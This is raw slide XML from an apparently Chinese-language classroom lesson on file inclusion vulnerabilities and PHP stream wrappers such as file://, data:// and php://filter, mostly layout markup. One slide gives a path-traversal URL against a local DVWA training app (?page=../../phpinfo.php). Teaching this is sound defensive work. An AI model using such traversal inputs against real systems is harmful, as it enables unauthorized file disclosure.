              <a:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../phpinfo.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6719570" y="1137285"/>
            <a:ext cx="5472430" cy="2478405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720205" y="3934460"/>
            <a:ext cx="5477510" cy="2288540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简介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64465" y="1925320"/>
            <a:ext cx="11902440" cy="4358640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184150" y="1416050"/>
            <a:ext cx="7000875" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪协议，为什么危险？因为它们能够</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简介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99135" y="1265555"/>
            <a:ext cx="10793730" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>伪协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>）是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>中的一种特性，允许开发者通过指定一个特殊的协议前缀来访问不同类型的资源。伪协议的主要目的是扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>的文件系统能力，使其能够访问不同类型的数据源，除了常规的文件系统之外。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>支持多种伪协议，常见的包括</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699135" y="2839720"/>
            <a:ext cx="9666605" cy="3476625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：用于访问本地文件系统中的文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$content = file_get_contents('file:///path/to/local/file.txt');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:// 和 https://：用于通过HTTP或HTTPS协议访问远程资源。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$content = file_get_contents('http://example.com');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftp://：用于通过FTP协议访问远程FTP服务器上的文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$content = file_get_contents('ftp://username:password@ftp.example.com/file.txt');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data://：用于直接使用数据字符串作为资源。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$data = file_get_contents('data:text/plain;base64,SGVsbG8gd29ybGQ=');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRP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伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简介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749935" y="1115695"/>
            <a:ext cx="10395585" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪协议是一种特殊的伪协议，用于在读取或写入数据时应用过滤器。它可以用于多种用途，如数据验证、清理或转换。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流可以通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php://filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来使用，主要用于对流内容应用内置的过滤器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>php://filter/[filter_name]/resource</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其中 [filter_name] 是要应用的过滤器名称，resource 是要过滤的实际资源（如文件或字符串）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>PHP提供了多种内置的过滤器，常见的包括：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    string.strip_tags：去掉字符串中的HTML和PHP标签。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    string.toupper：将字符串转换为大写。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    string.tolower：将字符串转换为小写。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    url：对URL进行编码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$html = "&lt;p&gt;Hello &lt;strong&gt;World&lt;/strong&gt;!&lt;/p&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$filtered = file_get_contents('php://filter/string.strip_tags/resource=' . urlencode($html));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo $filtered;  // 输出: Hello World!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$string = "hello world";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$filtered = file_get_contents('php://filter/string.toupper/resource=' . urlencode($string));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo $filtered;  // 输出: HELLO WORLD</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>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15925" y="1153795"/>
            <a:ext cx="3903345" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Content</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4658112" y="2721900"/>
            <a:ext cx="2832070" cy="674078"/>
            <a:chOff x="3799246" y="1097423"/>
            <a:chExt cx="2570654" cy="674078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="椭圆 5"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3799246" y="1097423"/>
              <a:ext cx="737774"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rPr>
                <a:t>1.</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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文本框 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4536993" y="1269227"/>
              <a:ext cx="1832907" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="1218565"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rPr>
                <a:t>文件包含</a:t>
              </a:r>
              <a:r>
                <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rPr>
                <a:t>定义</a:t>
              </a:r>
              <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4658107" y="4427161"/>
            <a:ext cx="2244692" cy="674078"/>
            <a:chOff x="3799246" y="1935623"/>
            <a:chExt cx="2037496" cy="674078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="椭圆 8"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3799246" y="1935623"/>
              <a:ext cx="882693"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rPr>
                <a:t>3.</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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419984" y="2056875"/>
              <a:ext cx="1416758" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1218565">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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 </a:t>
              </a:r>
              <a:r>
                <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随堂</a:t>
              </a:r>
              <a:r>
                <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练习</a:t>
              </a:r>
              <a:endPar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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="椭圆 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4658107" y="3550226"/>
            <a:ext cx="972456"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rPr>
              <a:t>2.</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90204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5470880" y="3724919"/>
            <a:ext cx="2019300" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="1218565"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rPr>
              <a:t>文件包含示例</a:t>
            </a:r>
            <a:endPar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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Freeform 69"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="913130" y="2144050"/>
            <a:ext cx="1974593" cy="4665055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 3562183 w 693"/>
              <a:gd name="T1" fmla="*/ 8655381 h 1641"/>
              <a:gd name="T2" fmla="*/ 2963736 w 693"/>
              <a:gd name="T3" fmla="*/ 5601544 h 1641"/>
              <a:gd name="T4" fmla="*/ 2838347 w 693"/>
              <a:gd name="T5" fmla="*/ 4486922 h 1641"/>
              <a:gd name="T6" fmla="*/ 3032130 w 693"/>
              <a:gd name="T7" fmla="*/ 4322004 h 1641"/>
              <a:gd name="T8" fmla="*/ 3254410 w 693"/>
              <a:gd name="T9" fmla="*/ 2877545 h 1641"/>
              <a:gd name="T10" fmla="*/ 2878243 w 693"/>
              <a:gd name="T11" fmla="*/ 1603691 h 1641"/>
              <a:gd name="T12" fmla="*/ 2245600 w 693"/>
              <a:gd name="T13" fmla="*/ 1381904 h 1641"/>
              <a:gd name="T14" fmla="*/ 1960625 w 693"/>
              <a:gd name="T15" fmla="*/ 1216985 h 1641"/>
              <a:gd name="T16" fmla="*/ 1943527 w 693"/>
              <a:gd name="T17" fmla="*/ 1160117 h 1641"/>
              <a:gd name="T18" fmla="*/ 2017620 w 693"/>
              <a:gd name="T19" fmla="*/ 369645 h 1641"/>
              <a:gd name="T20" fmla="*/ 1783941 w 693"/>
              <a:gd name="T21" fmla="*/ 0 h 1641"/>
              <a:gd name="T22" fmla="*/ 1299484 w 693"/>
              <a:gd name="T23" fmla="*/ 136484 h 1641"/>
              <a:gd name="T24" fmla="*/ 1219691 w 693"/>
              <a:gd name="T25" fmla="*/ 688108 h 1641"/>
              <a:gd name="T26" fmla="*/ 1367878 w 693"/>
              <a:gd name="T27" fmla="*/ 1137369 h 1641"/>
              <a:gd name="T28" fmla="*/ 1367878 w 693"/>
              <a:gd name="T29" fmla="*/ 1222672 h 1641"/>
              <a:gd name="T30" fmla="*/ 837825 w 693"/>
              <a:gd name="T31" fmla="*/ 1546822 h 1641"/>
              <a:gd name="T32" fmla="*/ 125389 w 693"/>
              <a:gd name="T33" fmla="*/ 3019716 h 1641"/>
              <a:gd name="T34" fmla="*/ 644043 w 693"/>
              <a:gd name="T35" fmla="*/ 4418680 h 1641"/>
              <a:gd name="T36" fmla="*/ 815027 w 693"/>
              <a:gd name="T37" fmla="*/ 4560851 h 1641"/>
              <a:gd name="T38" fmla="*/ 1253888 w 693"/>
              <a:gd name="T39" fmla="*/ 6727540 h 1641"/>
              <a:gd name="T40" fmla="*/ 1521764 w 693"/>
              <a:gd name="T41" fmla="*/ 8359665 h 1641"/>
              <a:gd name="T42" fmla="*/ 1316583 w 693"/>
              <a:gd name="T43" fmla="*/ 9110329 h 1641"/>
              <a:gd name="T44" fmla="*/ 1954926 w 693"/>
              <a:gd name="T45" fmla="*/ 9070521 h 1641"/>
              <a:gd name="T46" fmla="*/ 2000522 w 693"/>
              <a:gd name="T47" fmla="*/ 8553018 h 1641"/>
              <a:gd name="T48" fmla="*/ 1949226 w 693"/>
              <a:gd name="T49" fmla="*/ 7546446 h 1641"/>
              <a:gd name="T50" fmla="*/ 1903630 w 693"/>
              <a:gd name="T51" fmla="*/ 6642237 h 1641"/>
              <a:gd name="T52" fmla="*/ 2120211 w 693"/>
              <a:gd name="T53" fmla="*/ 5635665 h 1641"/>
              <a:gd name="T54" fmla="*/ 2821249 w 693"/>
              <a:gd name="T55" fmla="*/ 8274362 h 1641"/>
              <a:gd name="T56" fmla="*/ 3151819 w 693"/>
              <a:gd name="T57" fmla="*/ 9070521 h 1641"/>
              <a:gd name="T58" fmla="*/ 3949748 w 693"/>
              <a:gd name="T59" fmla="*/ 9258187 h 1641"/>
              <a:gd name="T60" fmla="*/ 655442 w 693"/>
              <a:gd name="T61" fmla="*/ 3457603 h 1641"/>
              <a:gd name="T62" fmla="*/ 712437 w 693"/>
              <a:gd name="T63" fmla="*/ 2979908 h 1641"/>
              <a:gd name="T64" fmla="*/ 2251299 w 693"/>
              <a:gd name="T65" fmla="*/ 3923924 h 1641"/>
              <a:gd name="T66" fmla="*/ 1789641 w 693"/>
              <a:gd name="T67" fmla="*/ 1745862 h 1641"/>
              <a:gd name="T68" fmla="*/ 1595858 w 693"/>
              <a:gd name="T69" fmla="*/ 1654872 h 1641"/>
              <a:gd name="T70" fmla="*/ 1681350 w 693"/>
              <a:gd name="T71" fmla="*/ 2758121 h 1641"/>
              <a:gd name="T72" fmla="*/ 1561661 w 693"/>
              <a:gd name="T73" fmla="*/ 3906864 h 1641"/>
              <a:gd name="T74" fmla="*/ 1339381 w 693"/>
              <a:gd name="T75" fmla="*/ 3082271 h 1641"/>
              <a:gd name="T76" fmla="*/ 1413474 w 693"/>
              <a:gd name="T77" fmla="*/ 1279541 h 1641"/>
              <a:gd name="T78" fmla="*/ 1903630 w 693"/>
              <a:gd name="T79" fmla="*/ 1290914 h 1641"/>
              <a:gd name="T80" fmla="*/ 2171506 w 693"/>
              <a:gd name="T81" fmla="*/ 2348668 h 1641"/>
              <a:gd name="T82" fmla="*/ 2342491 w 693"/>
              <a:gd name="T83" fmla="*/ 3918238 h 1641"/>
              <a:gd name="T84" fmla="*/ 2695860 w 693"/>
              <a:gd name="T85" fmla="*/ 2758121 h 1641"/>
              <a:gd name="T86" fmla="*/ 2855446 w 693"/>
              <a:gd name="T87" fmla="*/ 3275624 h 16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797979"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="76200" sy="23000" kx="1199993" algn="br" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="6000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="60952" tIns="30476" rIns="60952" bIns="30476"/>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75"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Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="246380"/>
            <a:ext cx="799592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KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7384335" y="44725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custDataLst>
